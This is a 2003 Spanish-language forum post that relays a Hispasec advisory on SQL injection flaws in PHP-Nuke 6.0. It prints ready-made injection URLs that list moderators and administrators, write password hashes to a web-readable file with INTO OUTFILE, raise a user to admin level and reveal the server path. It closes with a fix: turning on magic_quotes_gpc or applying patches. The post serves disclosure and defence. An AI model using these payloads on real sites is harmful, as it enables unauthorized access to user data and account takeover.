Tema: problema de seguridad en php-nuke
Ver Mensaje Individual
  #1 (permalink)  
Antiguo 10/03/2003, 18:06
Avatar de kctus
kctus
Usuario baneado!
  
Fecha de Ingreso: noviembre-2002
Ubicación: ToledoBsAsGaliciaBolivia
Mensajes: 1.038
Antigüedad: 21 años, 5 meses
Puntos: 1
problema de seguridad en php-nuke
Hola, he visto esta noticia y me ha parecido importante, por eso la pongo aqui (espero que eso no vaya en contra de las politicas del foro, etc)

------------------------
PHP-Nuke 6 y posiblemente superiores es vulnerable a varios ataques de inyección de código que permitiría el acceso a datos sensibles y/o la manipulación de la base de datos, según informó Hispasec.

PHP-Nuke es un sistema de publicación basado en PHP muy popular entre los portales de Internet. La vulnerabilidad, detectada en la versión 6.0, está causada por un error de validación de entrada en los módulos "Members_List" y "Your_Account" y será únicamente explotable cuando php esté configurado con "magic_quotes_gpc=OFF" (normalmente en php.ini).
Unos ejemplos de como explotar esta problema:

* Listado de moderadores:

http://[victima]/modules.php?name=Members_List&letter='%20OR%20user _leve l='2'/*

* Listado de administradores:

http://[victima]/modules.php?name=Members_List&letter='%20OR%20user _leve l='4'/*

* Creación de un archivo con todas los claves encriptadas:

http://[victima]/modules.php?name=Your_Account&op=mailpasswd&uname= ')%20 OR%201=1%20INTO%20OUTFILE%20'/[directorio]/Claves.txt'/*

http://[victima]/Claves.txt

* Elevación de privilegios:

http://[victima]/modules.php?name=Your_Account&op=savehome&broadcas t=',u ser_level='4&uid=[NUESTRO_UID]

* Revelación de directorio local:

http://[victima]/modules/Forums/bb_smilies.php

Una solución rápida a este problema, si tienes acceso a la configuración de php, sería editar el php.ini y activar la opción "magic_quotes_gpc=ON". En caso contrario en estos momentos ya existen parches en el web oficial.